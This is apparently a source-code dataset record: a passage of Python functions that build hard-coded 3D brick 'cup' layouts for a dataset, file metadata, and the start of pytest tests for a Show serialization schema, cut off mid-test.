    for i in range(2):
        put([13, i * 2 + 4, 7], 1)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 11, 5, 6 - j], 0)
    for i in range(2):
        for j in range(2):
            put([i * 3 + 11, 5, 4 - j], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 11, 5, 2 - j], 0)
    for i in range(2):
        put([13, i * 2 + 4, 0], 1)
    for i in range(2):
        for j in range(3):
            for k in range(3):
                put([i * 10 - 1, j * 4 + 1, 4 - k], 0)
    for i in range(2):
        for j in range(2):
            for k in range(3):
                put([i * 4 + 2, j * 10, 4 - k], 1)
    for i in range(5):
        for j in range(2):
            put([i * 2, j * 6 + 2, 1], 0)
    for i in range(2):
        for j in range(3):
            put([i * 10 - 1, j * 4 + 1, 0], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 2, j * 10, 0], 1)
    for i in range(4):
        put([i * 2 + 1, 5, 0], 0)

    for b in placed:
        container.add(b)
    return container
def cup_11():
    """Assemble the hard-coded brick layout for stage "cup 11".

    Returns a ``bricks.Bricks`` container (capacity 150): a small
    perimeter ring at z = 5 over a solid two-layer base and core.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(2):
        for j in range(4):
            for k in range(2):
                put([i * 4, j * 2, 4 - k], 1)
    for i in range(2):
        for j in range(2):
            put([2, i * 2 + 2, 2 - j], 1)

    for b in placed:
        container.add(b)
    return container
def cup_12():
    """Assemble the hard-coded brick layout for stage "cup 12".

    Returns a ``bricks.Bricks`` container (capacity 150): a small
    perimeter ring at z = 5 with side appendages on the +x and -x edges.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 4], 1)
    for i in range(2):
        for j in range(2):
            put([7, i * 2 + 2, 7 - 4 * j], 1)
    for i in range(3):
        put([9, 3, 6 - i], 0)
    put([-1, 3, 3], 0)

    for b in placed:
        container.add(b)
    return container
def cup_13():
    """Assemble the hard-coded brick layout for stage "cup 13".

    Returns a ``bricks.Bricks`` container (capacity 150): a compact ring
    with a descending diagonal arm of single bricks on the +x side.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 5], 1)
    for i in range(2):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([i * 2, 4, 5 + (i % 2 == 0)], 1)
    for i in range(2):
        put([3, 3 - i * 2, 5 + (i % 2 == 0)], 0)
    put([2, 0, 6], 1)
    # Arm stepping down from z = 7 to z = 3.
    put([5, 2, 7], 1)
    put([6, 2, 6], 0)
    put([7, 2, 5], 0)
    put([6, 2, 4], 0)
    put([5, 2, 3], 1)
    # Support layer at z = 4.
    put([0, 0, 4], 1)
    put([-1, 3, 4], 0)
    put([2, 4, 4], 1)
    put([3, 1, 4], 0)
    put([-1, 2, 7], 0)
    for i in range(2):
        put([2, i * 4, 7], 1)
    for i in range(2):
        put([i * 2, 2, 3], 0)

    for b in placed:
        container.add(b)
    return container
def cup_14():
    """Assemble the hard-coded brick layout for stage "cup 14".

    Returns a ``bricks.Bricks`` container (capacity 150).
    NOTE(review): this layout is identical to ``cup_11`` in the original
    source — possibly an oversight; kept as-is to preserve behavior.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(2):
        for j in range(4):
            for k in range(2):
                put([i * 4, j * 2, 4 - k], 1)
    for i in range(2):
        for j in range(2):
            put([2, i * 2 + 2, 2 - j], 1)

    for b in placed:
        container.add(b)
    return container
def cup_15():
    """Assemble the hard-coded brick layout for stage "cup 15".

    Returns a ``bricks.Bricks`` container (capacity 150): the cup_12
    layout extended with corner pillars and top/bottom frame plates.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 4], 1)
    for i in range(2):
        for j in range(2):
            put([7, i * 2 + 2, 7 - 4 * j], 1)
    for i in range(3):
        put([9, 3, 6 - i], 0)
    put([-1, 3, 3], 0)
    for i in range(2):
        for j in range(2):
            for k in range(2):
                put([i * 4, j * 6, 7 - 4 * k], 1)
    put([-1, 3, 7], 0)
    for i in range(2):
        put([2, i * 6, 2], 1)
    for i in range(2):
        put([i * 6 - 1, 3, 2], 0)
    for i in range(2):
        put([2, i * 6, 8], 1)
    for i in range(2):
        put([i * 6 - 1, 3, 8], 0)
    for i in range(2):
        for j in range(2):
            for k in range(2):
                put([i * 4, j * 6, 9 - 8 * k], 1)
    for i in range(2):
        for j in range(2):
            put([i * 6 - 1, 3, 9 - 8 * j], 0)

    for b in placed:
        container.add(b)
    return container
def cup_16():
    """Assemble the hard-coded brick layout for stage "cup 16".

    Returns a ``bricks.Bricks`` container (capacity 100): an elongated
    perimeter frame with interior supports on two levels.
    """
    container = bricks.Bricks(100)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    for i in range(3):
        put([i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(5):
        for j in range(2):
            put([j * 6 - 1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 10, 5 + (i % 2 == 1)], 1)
    for i in range(2):
        put([1, 1, 7 - 3 * i], 1)
    for i in range(2):
        for j in range(2):
            put([0, i * 4 + 4, 7 - 3 * j], 0)
    for i in range(2):
        put([3, 9, 7 - 3 * i], 1)
    for i in range(2):
        for j in range(2):
            put([4, i * 4 + 2, 7 - 3 * j], 0)
    for i in range(3):
        put([2, i * 2 + 3, 3], 1)

    for b in placed:
        container.add(b)
    return container
def cup_17():
    """Assemble the hard-coded brick layout for stage "cup 17".

    Returns a ``bricks.Bricks`` container (capacity 100): a rectangular
    frame at z = 5 over a slab, central column, and base slab.
    """
    container = bricks.Bricks(100)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    for i in range(4):
        put([i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([7, i * 2 + 1, 5 + (i % 2 == 1)], 0)
    for i in range(4):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        for j in range(2):
            put([i * 2 + 1, j * 4 + 1, 4], 0)
    for i in range(2):
        for j in range(3):
            put([3, 2 * i + 2, 3 - j], 1)
    for i in range(3):
        for j in range(2):
            put([i * 2 + 1, j * 4 + 1, 0], 0)

    for b in placed:
        container.add(b)
    return container
def cup_18():
    """Assemble the hard-coded brick layout for stage "cup 18".

    Returns a ``bricks.Bricks`` container (capacity 100): a perimeter
    frame at z = 6 over two alternating pinwheel layers and base plates.
    """
    container = bricks.Bricks(100)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    for i in range(3):
        put([i * 2, 0, 6 + (i % 2 == 1)], 1)
    for i in range(3):
        for j in range(2):
            put([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 6 + (i % 2 == 1)], 1)
    # Pinwheel layer at z = 5.
    put([1, 1, 5], 1)
    put([0, 4, 5], 0)
    put([3, 5, 5], 1)
    put([4, 2, 5], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4, j * 6, 4], 1)
    for i in range(2):
        put([i * 6 - 1, 3, 4], 0)
    # Pinwheel layer at z = 3.
    put([1, 1, 3], 1)
    put([0, 4, 3], 0)
    put([3, 5, 3], 1)
    put([4, 2, 3], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4, j * 6, 2], 1)
    for i in range(4):
        put([i * 2 - 1, 3, 2], 0)

    for b in placed:
        container.add(b)
    return container
def cup_19():
    """Assemble cup model #19 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(100)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Wide perimeter courses (z alternates between 6 and 7 with parity).
    for i in range(7):
        put([i * 2, 0, 6 + (i % 2 == 1)], 1)
    for i in range(7):
        for j in range(2):
            put([j * 14 - 1, i * 2 + 1, 6 + (i % 2 == 0)], 0)
    for i in range(7):
        put([i * 2, 14, 6 + (i % 2 == 1)], 1)
    # Two stacked layers (z=8 and z=5) along the front/back edges...
    for i in range(4):
        for j in range(2):
            for k in range(2):
                put([i * 4, j * 14, 8 - 3 * k], 1)
    # ...and along the left/right interior columns.
    for i in range(2):
        for j in range(6):
            for k in range(2):
                put([i * 12, j * 2 + 2, 8 - 3 * k], 1)
    # Interior fill at z=4 and z=3.
    for i in range(2):
        for j in range(6):
            put([i * 8 + 2, j * 2 + 2, 4], 1)
    for i in range(2):
        for j in range(6):
            put([i * 4 + 4, j * 2 + 2, 3], 1)
    for i in range(2):
        put([6, i * 14, 4], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_20():
    """Assemble cup model #20 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(100)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Top perimeter courses (z alternates between 6 and 7 with parity).
    for i in range(3):
        put([i * 2, 0, 6 + (i % 2 == 1)], 1)
    for i in range(3):
        for j in range(2):
            put([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 6 + (i % 2 == 1)], 1)
    # Double-height ring at z=5 and z=4.
    for i in range(2):
        for j in range(2):
            for k in range(2):
                put([i * 4, j * 6, 5 - k], 1)
    for i in range(2):
        for j in range(2):
            put([i * 6 - 1, 3, 5 - j], 0)
    # Solid bottom layer at z=3.
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 3], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_21():
    """Assemble cup model #21 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(150)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Small perimeter at the top (z is 5 or 6 depending on parity).
    put([0, 0, 5], 1)
    for i in range(2):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([i * 2, 4, 5 + (i % 2 == 0)], 1)
    for i in range(2):
        put([3, 3 - i * 2, 5 + (i % 2 == 0)], 0)
    put([2, 0, 6], 1)
    # Ring at z=4.
    put([0, 0, 4], 1)
    put([-1, 3, 4], 0)
    put([2, 4, 4], 1)
    put([3, 1, 4], 0)
    # Center fill at z=3.
    for i in range(2):
        put([1, i * 2 + 1, 3], 1)
    # Three identical rings stacked at z=2, 1, 0.
    for i in range(3):
        put([0, 0, 2 - i], 1)
        put([-1, 3, 2 - i], 0)
        put([2, 4, 2 - i], 1)
        put([3, 1, 2 - i], 0)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_22():
    """Assemble cup model #22 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(150)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Perimeter courses (z is 5 or 6 depending on parity).
    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    # Solid layer at z=4.
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 4], 1)
    # Handle pieces on the x=7..9 side (z=7 and z=3).
    for i in range(2):
        for j in range(2):
            put([7, i * 2 + 2, 7 - 4 * j], 1)
    for i in range(3):
        put([9, 3, 6 - i], 0)
    put([-1, 3, 3], 0)
    # Corner posts at z=7 and z=3.
    for i in range(2):
        for j in range(2):
            for k in range(2):
                put([i * 4, j * 6, 7 - 4 * k], 1)
    put([-1, 3, 7], 0)
    # Pieces attached on/around the rim at z=8 and x<0.
    for i in range(2):
        put([5, i * 4 + 1, 8], 0)
    for i in range(2):
        put([2, i * 6, 8], 1)
    for i in range(2):
        put([-2, i * 4 + 1, 8], 1)
    put([-3, 3, 7], 0)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_23():
    """Assemble cup model #23 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(150)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Perimeter courses (z is 5 or 6 depending on parity).
    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    # Two solid layers at z=4 and z=3.
    for i in range(2):
        for j in range(4):
            for k in range(2):
                put([i * 4, j * 2, 4 - k], 1)
    # Central stem, three layers deep (z=2, 1, 0).
    for i in range(4):
        for j in range(3):
            put([2, i * 2, 2 - j], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_24():
    """Assemble cup model #24 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(100)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Perimeter courses (z alternates between 5 and 6 with parity).
    for i in range(4):
        put([i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([7, i * 2 + 1, 5 + (i % 2 == 1)], 0)
    for i in range(4):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    # Cross-braces at z=4, central column (z=3..1), cross-braces at z=0.
    for i in range(3):
        for j in range(2):
            put([i * 2 + 1, j * 4 + 1, 4], 0)
    for i in range(2):
        for j in range(3):
            put([3, 2 * i + 2, 3 - j], 1)
    for i in range(3):
        for j in range(2):
            put([i * 2 + 1, j * 4 + 1, 0], 0)
    # Overhanging rim pieces at z=7 on all four sides.
    for i in range(2):
        put([-2, i * 4, 7], 0)
    for i in range(3):
        put([i * 4 - 1, 7, 7], 1)
    for i in range(2):
        put([i * 4 + 1, -1, 7], 1)
    for i in range(2):
        put([8, i * 4, 7], 0)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_25():
    """Assemble cup model #25 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(100)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Top perimeter courses (z alternates between 6 and 7 with parity).
    for i in range(3):
        put([i * 2, 0, 6 + (i % 2 == 1)], 1)
    for i in range(3):
        for j in range(2):
            put([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 6 + (i % 2 == 1)], 1)
    # Ring at z=5.
    for i in range(2):
        for j in range(2):
            put([i * 4, j * 6, 5], 1)
    for i in range(2):
        put([i * 6 - 1, 3, 5], 0)
    # Solid bottom layer at z=4.
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 4], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_26():
    """Assemble cup model #26 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(100)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Perimeter courses (z alternates between 5 and 6 with parity).
    for i in range(4):
        put([i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([7, i * 2 + 1, 5 + (i % 2 == 1)], 0)
    for i in range(4):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    # Cross-braces at z=4, central column (z=3..1), cross-braces at z=0.
    for i in range(3):
        for j in range(2):
            put([i * 2 + 1, j * 4 + 1, 4], 0)
    for i in range(2):
        for j in range(3):
            put([3, 2 * i + 2, 3 - j], 1)
    for i in range(3):
        for j in range(2):
            put([i * 2 + 1, j * 4 + 1, 0], 0)
    # Cap pieces at z=7.
    for i in range(2):
        for j in range(2):
            put([i * 4 + 1, j * 4 + 1, 7], 1)
    for i in range(2):
        put([i * 6, 3, 7], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_27():
    """Assemble cup model #27 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(150)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Perimeter courses (z is 5 or 6 depending on parity).
    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    # Solid bottom layer at z=4.
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 4], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_28():
    """Assemble cup model #28 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(150)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Lower perimeter courses (z is 5 or 6 depending on parity).
    put([0, 0, 5], 1)
    for i in range(3):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 5 + (i % 2 == 1)], 1)
    for i in range(3):
        put([5, 5 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([4 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    # Tall walls: five courses stacked from z=7 to z=11.
    for i in range(2):
        for j in range(2):
            for k in range(5):
                put([i * 6 - 1, j * 6, 7 + k], 0)
    for i in range(2):
        for j in range(5):
            put([2, i * 6, 7 + j], 1)
    for i in range(2):
        for j in range(5):
            put([i * 6 - 1, 3, 7 + j], 1)
    # Interior fill at z=4.
    for i in range(2):
        for j in range(2):
            put([i * 4, j * 2 + 2, 4], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_29():
    """Assemble cup model #29 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(150)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Small lower perimeter (z is 5 or 6 depending on parity).
    put([0, 0, 5], 1)
    for i in range(2):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(2):
        put([i * 2, 4, 5 + (i % 2 == 0)], 1)
    for i in range(2):
        put([3, 3 - i * 2, 5 + (i % 2 == 0)], 0)
    put([2, 0, 6], 1)
    # Four corner columns, five courses tall (z=7..11).
    for i in range(5):
        put([-1, 1, 7 + i], 0)
    for i in range(5):
        put([2, 0, 7 + i], 1)
    for i in range(5):
        put([0, 4, 7 + i], 1)
    for i in range(5):
        put([3, 3, 7 + i], 0)
    # Base plate at z=4.
    for i in range(2):
        for j in range(4):
            put([i * 4 - 1, j * 2 - 1, 4], 1)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
def cup_30():
    """Assemble cup model #30 and return it as a Bricks collection."""
    bricks_ = bricks.Bricks(100)
    staged = []

    def put(position, direction):
        # Configure one brick and stage it; all staged bricks are added at the end.
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        staged.append(piece)

    # Perimeter courses (z alternates between 6 and 7 with parity).
    for i in range(3):
        put([i * 2, 0, 6 + (i % 2 == 1)], 1)
    for i in range(3):
        for j in range(2):
            put([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)], 0)
    for i in range(3):
        put([i * 2, 6, 6 + (i % 2 == 1)], 1)
    # Double-height ring at z=5 and z=4.
    for i in range(2):
        for j in range(2):
            for k in range(2):
                put([i * 4, j * 6, 5 - k], 1)
    for i in range(2):
        for j in range(2):
            put([i * 6 - 1, 3, 5 - j], 0)
    # Base layer at z=3.
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 3], 1)
    # Four corner columns rising from z=8 to z=11.
    for i in range(4):
        put([1, 1, 8 + i], 1)
    for i in range(4):
        put([0, 4, 8 + i], 0)
    for i in range(4):
        put([3, 5, 8 + i], 1)
    for i in range(4):
        put([4, 2, 8 + i], 0)

    for piece in staged:
        bricks_.add(piece)
    return bricks_
if __name__ == '__main__':
    # Every cup builder in order; each returns an independent Bricks model.
    builders = (
        cup_1, cup_2, cup_3, cup_4, cup_5,
        cup_6, cup_7, cup_8, cup_9, cup_10,
        cup_11, cup_12, cup_13, cup_14, cup_15,
        cup_16, cup_17, cup_18, cup_19, cup_20,
        cup_21, cup_22, cup_23, cup_24, cup_25,
        cup_26, cup_27, cup_28, cup_29, cup_30,
    )
    list_bricks_ = [build() for build in builders]
    dataset_common.create_bricks(list_bricks_, dataset_common.STR_LABEL_CUP)
| 28.530166
| 78
| 0.522455
| 10,153
| 75,662
| 3.557963
| 0.006205
| 0.344646
| 0.358349
| 0.266305
| 0.988069
| 0.987681
| 0.9871
| 0.986962
| 0.986436
| 0.983141
| 0
| 0.053873
| 0.349634
| 75,662
| 2,651
| 79
| 28.540928
| 0.680235
| 0
| 0
| 0.884004
| 0
| 0
| 0.000106
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014032
| false
| 0
| 0.001403
| 0
| 0.029467
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7554b1d34c6de3134c535272754fff9f906e1843
| 6,413
|
py
|
Python
|
tests/schema/test_show.py
|
aliceplex/schema
|
cb559e0172462c743d90c26a77419833b55d113a
|
[
"Apache-2.0"
] | null | null | null |
tests/schema/test_show.py
|
aliceplex/schema
|
cb559e0172462c743d90c26a77419833b55d113a
|
[
"Apache-2.0"
] | 5
|
2018-11-26T06:00:48.000Z
|
2018-11-27T07:09:52.000Z
|
tests/schema/test_show.py
|
aliceplex/schema
|
cb559e0172462c743d90c26a77419833b55d113a
|
[
"Apache-2.0"
] | null | null | null |
from datetime import date
import pytest
from marshmallow import ValidationError
from aliceplex.schema import Actor, Show, ShowSchema, ShowStrictSchema
def test_show_schema_load(show_schema: ShowSchema):
    """ShowSchema.load handles a full payload, a blank payload, and an empty dict."""
    full_payload = {
        "title": "title",
        "sort_title": "sort_title",
        "original_title": "original_title",
        "content_rating": "content_rating",
        "tagline": ["tagline"],
        "studio": ["studio"],
        "aired": "2018-01-01",
        "summary": "summary",
        "rating": 1,
        "genres": ["genres"],
        "collections": ["collections"],
        "actors": [{"name": "name", "role": "role"}],
        "season_summary": {1: "Season 1 Summary"}
    }
    expected = Show(
        title="title",
        sort_title="sort_title",
        original_title="original_title",
        content_rating="content_rating",
        tagline=["tagline"],
        studio=["studio"],
        aired=date(2018, 1, 1),
        summary="summary",
        rating=1,
        genres=["genres"],
        collections=["collections"],
        actors=[Actor(name="name", role="role")],
        season_summary={1: "Season 1 Summary"}
    )
    assert show_schema.load(full_payload) == expected

    # Empty strings / None / empty containers collapse to the default Show.
    blank_payload = {
        "title": "",
        "sort_title": "",
        "original_title": None,
        "content_rating": "",
        "tagline": [""],
        "studio": [None],
        "aired": None,
        "summary": None,
        "rating": None,
        "genres": [],
        "collections": None,
        "actors": [],
        "season_summary": {}
    }
    assert show_schema.load(blank_payload) == Show()
    # Missing keys behave the same as blank ones.
    assert show_schema.load({}) == Show()
def test_show_schema_dump(show_schema: ShowSchema):
    """ShowSchema.dump serializes both a populated Show and a default Show."""
    populated = Show(
        title="title",
        sort_title="sort_title",
        original_title="original_title",
        content_rating="content_rating",
        tagline=["tagline"],
        studio=["studio"],
        aired=date(2018, 1, 1),
        summary="summary",
        rating=1,
        genres=["genres"],
        collections=["collections"],
        actors=[Actor(name="name", role="role")],
        season_summary={1: "Season 1 Summary"}
    )
    expected_full = {
        "title": "title",
        "sort_title": "sort_title",
        "original_title": "original_title",
        "content_rating": "content_rating",
        "tagline": ["tagline"],
        "studio": ["studio"],
        "aired": "2018-01-01",
        "summary": "summary",
        "rating": 1,
        "genres": ["genres"],
        "collections": ["collections"],
        # Actor's unset photo field is serialized explicitly as None.
        "actors": [{"name": "name", "role": "role", "photo": None}],
        "season_summary": {1: "Season 1 Summary"}
    }
    assert show_schema.dump(populated) == expected_full

    # A default Show dumps scalars as None and collections as empty.
    expected_empty = {
        "title": None,
        "sort_title": None,
        "original_title": None,
        "content_rating": None,
        "tagline": [],
        "studio": [],
        "aired": None,
        "summary": None,
        "rating": None,
        "genres": [],
        "collections": [],
        "actors": [],
        "season_summary": {}
    }
    assert show_schema.dump(Show()) == expected_empty
def test_show_strict_schema_load(show_strict_schema: ShowStrictSchema):
    """ShowStrictSchema.load accepts a full payload but rejects None/missing fields."""
    full_payload = {
        "title": "title",
        "sort_title": "sort_title",
        "original_title": "original_title",
        "content_rating": "content_rating",
        "tagline": ["tagline"],
        "studio": ["studio"],
        "aired": "2018-01-01",
        "summary": "summary",
        "rating": 1,
        "genres": ["genres"],
        "collections": ["collections"],
        "actors": [{"name": "name", "role": "role"}],
        "season_summary": {1: "Season 1 Summary"}
    }
    expected = Show(
        title="title",
        sort_title="sort_title",
        original_title="original_title",
        content_rating="content_rating",
        tagline=["tagline"],
        studio=["studio"],
        aired=date(2018, 1, 1),
        summary="summary",
        rating=1,
        genres=["genres"],
        collections=["collections"],
        actors=[Actor(name="name", role="role")],
        season_summary={1: "Season 1 Summary"}
    )
    assert show_strict_schema.load(full_payload) == expected

    # Every field set to None must fail strict validation.
    field_names = (
        "title", "sort_title", "original_title", "content_rating",
        "tagline", "studio", "aired", "summary", "rating",
        "genres", "collections", "actors", "season_summary",
    )
    all_none_payload = {name: None for name in field_names}
    with pytest.raises(ValidationError):
        show_strict_schema.load(all_none_payload)
    # An entirely empty payload must also fail.
    with pytest.raises(ValidationError):
        show_strict_schema.load({})
def test_show_strict_schema_dump(show_strict_schema: ShowStrictSchema):
    """ShowStrictSchema.dump serializes both a populated Show and a default Show."""
    populated = Show(
        title="title",
        sort_title="sort_title",
        original_title="original_title",
        content_rating="content_rating",
        tagline=["tagline"],
        studio=["studio"],
        aired=date(2018, 1, 1),
        summary="summary",
        rating=1,
